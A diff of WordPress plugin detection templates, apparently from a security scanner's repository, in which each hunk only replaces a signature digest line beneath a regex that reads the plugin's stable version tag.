ab563aa984..db7f1fe112 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205db1e235b4c173f06ad77475ac37b3b8d5c51b3d18c95a095e8ef0f1b9fecbcf02203d279f85cdac0eb390aed99618cb0f2726e11ddd412b64415c72a288a7cb81c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed7a25db7035327d790f83d1fbb013fab8b4b49cfcbef8ff2716bbe37a80cc1f022100d5528292c0f0f175d003ca4cf6ec162658cdea15ab14d6b9bda9e061bb70f27a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 2ded55f13c..be5aa9cc9d 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203f43218438b6a32e1695f5167b60390b38f86728b53536697f7d12bb7d4a3790022100e41e0b753ee53ac3e4a7f48e9cea207b3129e655bb39f78264e8791a8e05e62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220338a1e7eaceb66622f7774494791561194da9c5bdcf5f2e3cc8dfd5b1e5c91d002206429600c6bdd6c07161dcd6004973b2c07f2fb949ebb47119dca431e0b7c20c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index c356055f4b..3e55be02b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202833d9d96efb59ddcd8f65838ac9b956c57a9aaa196afdf6a5c0fdc20f00448a0220505448b63a137092cd9aec8907fdc9bf2359ce500965d13f2719a669934295dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055ae05f1e4b07fcd0b54025d9b3a2533d9a22410364a2364993289ea9a543b9f02200f7716f4a1a609bb01cdae232310d977dcd6735ce4f897bbb1e011220c95f688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index eac8d3fa10..ab375e0e63 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207f5a5603236be82a480f26eea8b46d07582c423c5049bf0e82879ea0d70cd3d80221009ec463b340304734eaaa49739b40f9f60b82935d3de6cc8bba833c3a504fb271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b7d7310c00b5507b9db809b4fad5d1729439744b260ed83a9cca3036a9c4cf81022100ea2746869da96b4c5224bf62c7e0811182951430144fd300cbc97aa667a0e89f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 7e74d8735d..5c0d53005a 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f8ed7c7e59192e2f205a83294a8791f52abe238ad71ccad5d8661291c84b4a76022020a5c4a2388cf514ee7d7c2f16145116249b799886ab0bfb468c59951ef0b3d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fecfbd9aaf59d46575a0743d6b6ec6f0be350c5aeeb69475baba3fc577b2a77e02202b7dc68a62a40d4c372ab21de01f477cbc36d0b1b1fb4d9fc53eda60ea5bcfb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03262a8a4b..e606bb9f01 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d0f507daba73c8248c43c9a93ed5410452fbea0a689a8f6761686d7cbf7afd4a02210084dadc02987394d7c20188ba89819cb8433eb75ff0c9f61090b32c30ce6e7393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220487c28e7b6db4fd6f68f3b3a29724726cd6d52e888702a19bb68ac89de9656210220132953b930570f3273d0741127fd20aaaa933159e7b331137ca61fd1c2e5d096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3603d7b896..f6c0d979f4 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100be3841c78ced7493b4c8196c9449735c0649c2e433a5af149f9822dbc3a3446902210085f29f65784dc59cfa66e31e10d0ac9176debea5917692a099317b24efdff108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d75a0ee427501942ac9ad05a8dd8f37529d8d94c3382a6bcf9288788a5054340022100f30f37468b8ecdae174021404e90ddd5b5e04a4111c638c12348e7f580807dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6fe7c93da0..743dc050ad 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f7c17a32fcdf7282b76bb9d4952bdbdd5442cba4e63f7cf5a64906efe27af2c1022100b1309ec7f47da7c812644f0d3736af5c123bc6053f9218a56e73a587e8b5c4f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061c5137ed28a04a96dddb94ba00bcd16d512836d5b144c89eea4c2efb875c2580220221e06a89db312b491d52154b7b477d7da09d44e2e197d76494c3e4dd9914aec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index e46eaa929c..2e56faf5c8 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b8a2c63dbfade636939d1465ca6f4b474d5695d7aa83344e49fe97c7b5594c53022100ddc4014dfeca87d6d9b726d9aab71083be79b056c64ac036ebde7877ef98108e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cc0ab63f8ee4fc370aeda7519f49dde626bda9bc7e61f922a98009f4c6c63b86022074676b4a31d1015b2c10e52f034a9adfd90eda7e6ad19cc4dc1d9e217cd4f17d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 393dc15889..a3afb2f119 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204db51b70cbdd72b8b8d37137407842846950b310dd129f0bdf16cfd0dcbef41b022100b2cc388542a9555f675d756b967c1602e73be05f7889552324f3afdd8dddca89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057e7f80a5e2cfebe36c737bceb5b5479b76e36009076f112be16da1814558fb002201c237b4f88c5e76a27406cf0950bc6dbe07158d69fa8038ae0bfd10bdb5ee862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 1233a0ab1a..9078bbf0c8 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100994052f8bdd864a8b2cc9cfb2dc3b921d011aa5d98480bd90b720e9d146bab98022016bb3b25aa5d38a04c114723a5bceded8c06365d73ca139318e72f460face4f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085af9ca88cb3a82896ee48ab027c59efd7797cb55d8db087d7d501b08275bae402201dc933107e83edc2d5e12c141042905d8dfacafff217d5372ee37308a4bd009a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 51733fcbcf..f2043dcc75 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022007b643d4262a1b37527a89e024a74f3d00401cd353a93cb83971bfca6814dcd00220431979eda650fd4e2026144c4f3aa6812b9cb94f26e8b4d87f1eee0a6b01e97a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff3fa147033e1a8146697dbfe1a27338ed2cb9e801b6ad8317e7fcefd611ce2302204ffac7e625873cdbcc7545dcbcbf7737a1a274bc5c6b5b5234c017fce1193659:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cf5e2563c9..45b3dc0fb5 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210095dacbe63ab57285362f89e052a5a6d829816b77115cfe84c4b3687cebc260fa02200ec297e041496571955661ff328a9f99134f8b40c35741e26136bfb8efd2129b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205bba40a727f6ee8be125ea572c7e138478967af62782e2f28472a73fd4a948de02210099af0d856662cbc6c10fc09653fe6b3e611e24aa7c0a568b5aab9555beb2a079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 4f0b2294fb..77e01e0356 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022048f16e986a4441e5ce375c187de9551884b961549bee05e87a84496363017b41022100e149c49d0204f14f31e84ae8a70a2cb3c46a1b300104ee6143df4367e81cc46d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a6847815dc34463482af1c6b421d712ac2c4ec91c4adc64d1baa15e28462285022100a21a5b0987822e228638c829f0017c96120095ebf6e775e51386efb314cd2372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 70cbfc333a..e52f8e56ea 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022077020416f9dc430108239b22dc615bb613433577afb533a8ac9cb12566f090c1022100c31a0597bb0093ed5c9559634ae76c18f9e60b91110c889006e01b4492d0fe3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6b8ed2ce50d9c63419b43fdc2000c52f49d83025fc28f357a9d21a377f7174d022100fff1e43bd144ae1b466808448df09bedeb985d038671329f4be05bbef3e0248a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 956a4e073b..c6c81aaa8e 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e843e630ca74a8b83edcbd02508d803632b818c9d1e6bba174ed589fee8f5275022072359ee1811af3817a9031f70e2150cbd37de91fa8e3fc1ab80a688ea06a450e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b19f3617dcda4fc50a296c7e6f3b22ba2f8fa9130a40ac142694e1b941fe1e6e022061450064a35b3af8feb921d08dd908bca2d8685fe28dd62d49123706f2320123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index fbdd40f585..2e091f8aa4 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009c4720b2c5eddf620de24cff361069e53ecc46fb2337cfe348e8b829bc1d8ec30220317b274c08fcd14fe8387b6f4982bb331eeb147dd66222e708b54161e419c305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202333fcf960eecc20f6820d2106d9f1f21d9e266ce130d68aee4b997d8d61d92002201fc840231ddc4af941d6943fa0aee54fb9bef54a505a434b0e7acf65a571904f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index c933b5f1d8..c6b258a7a0 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207b7001908905140ebe3738ef401aedcc69fbf3827f02b63195ffe4c6493b641d022030acecf8d2d0c634af8418659c28980b1132f5561fe1a6deec54d4a71e6163e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a4bddf226dec0a17cbeae709e9a9f5610923ce8601b96dc76ec312e0eac98c502207f49017cd130161aa2a983774a58162b63ffcf88aca327e4e8a5615e35ddf9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3655c102a4..4d4fc5f81c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206d2218029dca72a6d17d0f312ea33fb5b1b5276dd55054936b2af42b997a43170221008c0f5fc9226dd03310ea2492678e18002f2b6678fc325a27da61a8078fad11ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077e56f07c8a2fbca01bbfe49f53c7729e395b78937e5320398bc0787bd09773602203a6664bcafcc30b906870de975bc874b1c27d9d008165d5c1bec5a47323b1063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 00e6b4db3b..3ceff962b7 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a9f5b1fb9d01bd31c469b28c0683dacc1bad9d7941d2083ce7d181effc3cd70c022100b38254151eac96e637a758a45b168090c1b5ab772d40fecba1500216e230026f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b5f38a1bea76695c7890bc168534d1f70830d563b7291f1b6b103151a9d5d0f022028ac19ffba6d11f33ccd60188f9c3905dce68ff6a82c398ba3412060d892ac94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 0b05499e0e..c812dc716b 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210094440f9db069c251066ee556c4935c28ec1f95f0a08b10588b2425204ae5cfad022100abb8a232e8498e9f9bdc8c375700c5508c9fc9bb1e6431139ca1f3b1a66dbe73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2e04d54f22520fbde8841bd693cbcb860b5b9f47ec08583c98eb0bde185b26b022069b84720ad523bb4027f618a54e2d4d09cf46cca2e88906c9456f3832daa2c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index b21da2c187..6ffb81a575 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008ed49c548872cf4896a22fca042a00937170eb9b4a05da5af0ef8aeaded369c7022100c04ec8d57c183eb4fad3202bcd87bdc827cfeca28ecdd8f4bee21a3ebff12ff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008791d7c2eba95e4d2387e2a782811dcb8e06bc5c71b49aec0aeef88d541cf11702205d84bdd80140c299ea14ea76211d7bb8826d0c68d09767c65b1ea393c2312c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 077fd7cd58..65900f81da 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022013227a14181e387280f6177d75da74b80d1a008a879542f15764ce4be0136c43022100f0427dd330b76c89517316d2f68f2a4ef5bdde6a75b534b2f7d71b0cea6ee783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ae79379c44ad371addbc9165df10e5318088ce36eae311f2f84f3855934384002210097d4d117b1615c14a41b49f1d4f6053fc6f3c209ef361c8a55fba5bbc68cf054:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index d296a03a68..b630b4edd7 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100afa3de76a6df687f45328302ce2708c7a2dc7098d9ca1c2570ac7e69ac4e6223022059d983226958a6f826212a0cb32c7254fe208e36fec5087c043caa51b97fe830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022077fb7caa895905229c307d6b163d397a727034ce1a0f5d364a113748473291250221008ca5cb2ae819587d9cba85f27514ed28bdbd870f8bdd14557705252736166174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 86d414fe2d..7696cb7175 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220178fbc22f0cea5bd7db7b587611a102513737306306e9dc520693eab922c01eb0220301783532c40a024cbd6720a6abfa4796c3d03834542790e71db17c11746e501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5384d02f40ca0e5320c519182dd8d9cd7be9bbc4f4f5206a6ac28a10ae1816202204a1683e0ad230a2016201f5213969cdcd295c3cc11f3be07e726f69df96b7e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 6a4aca550c..c8f3d7c89d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207f9aaf329a1a18267d211308c463e769a797afe3641cf941880c8cb2f1a3654b022100ffe5138572370fd699b621d79ae8c9f53e7fe2517edf3e40b7a8638b74402935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220084deeb814d8e1bb5ba9c866420240f57a995ed447fd3523bcfb41490b0b6dc2022100e0d7d81c8434a9aaa40a2c33e75a7965813441550a6fb4c50413bbc31cd0819c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index d4cece88aa..3cab19ad29 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207f8657f4973cd1ba8e9a6c44249027eb8bcbbd5813fc9d157d8171f83946eef002203bb76a5e058edd42ef03fe3794efffe2ba146e0308008240df9a47778dd923c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a75daf0d948d753aabdd3e67b4ff80112e981622447cc30424219547fa0717b7022035596b75933db687828693ee3de9f75a95776076d92a394437284770355304fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index da4ae1130c..b9e323e10b 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220651b1698eea9c9f476c8a0a1041ab0eae10c3c76ee17be3975b0857c01de699f0220195c43b14e31b143847fb2babe60836944ba9da7fd52877d54bb79205ceb0af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f77888cd5669af867d8b5b7d57829fc00b1aaebdf46684a4fe23f608b83b9aa2022031e1d9ae920c09363ec8bf8051477fd1d6ee9110468d129a6bb262a2f53c614e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 8ceba84542..7fd1244076 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100facd5cd0407a5cd52cd02cddb83ecea8fea12939e1d6bcfbc404149946f6a83f0220640709b1fd58d4d91b194d76dce3b9c841a4d8ee54230cf1d107e274fbfb347c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b832e7f7f6ef846ad7be54a338b9cb10b260bba8402ef19723779336c7e1842f022019cc97e22d8fd2d2630e72ee9bf0bdd2b83332781242e4c7e697936ec3041d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 2dc00d3c1d..9ad8949e31 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100caf04b4807b717467d83eb0dcb3e6458b93e6d667c8361f353185a363147890c022062325b5c995db687a5d7733d99c225b23b49f950cea213d48186f869364c0d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c867db888d5e6f5ee5c1bd182cb4a78d25473fc2efa8df0c58974c3d2eb01fd02201f21d5071606dbf821c901ee5e2e30731b9b5f9ad4cbf8984e7b00370541bdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 870e2ca97d..50517b715a 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bd027786c2d99763822c3964c61c7c5c27e6b89d259139835a872a7b5e83b611022100a57fc22adcdb7214baed125a69fd9e539e7e36d0c535f47f5da60884ba2678c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae57cc3efe74f1c2751879aaf08e0034daaafc4d3ad930d8a621dac7f9cd69800220628232c4d651475ce17e592e187ffccb77c5162654c8066d0fc65948e782ade9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index ab691c060d..a4372dd5ff 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203b092ba8ed1e79772da08151c60e2f7153970192c24d6e572faade5df3e27d4f022100c21d93adad12ca127b0dd3d808a7e49592112487bd1c1b25cc60462f899336ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b627706cebc1a4248bed04c4f7d225502bdd6ca28d5f95afe8359a9431256a3902207851af73e3f223ce8b1f25162ae036064d2da5877851acd8128e8b8f7221f86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index e376fb7f6a..6ba5fbe28f 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022073eba7d7d5c269ff38d70d788e225b18ab987debe2d26d4a7ba07460b70a74f5022100eda428b8c7e102abeeeacb3c73f6bf0fd87b3ecd4cc38e50e5952a7bdf10c127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065a9b5a9d695e13d046507c87150aec279074a33119d2c66409a6f7503adc4df02210099fe06e389f0b9d9cdd36bb29fa72c6dd857001c2ca4c38b03d2b59b139a59ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index aebe82c34c..52039be918 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 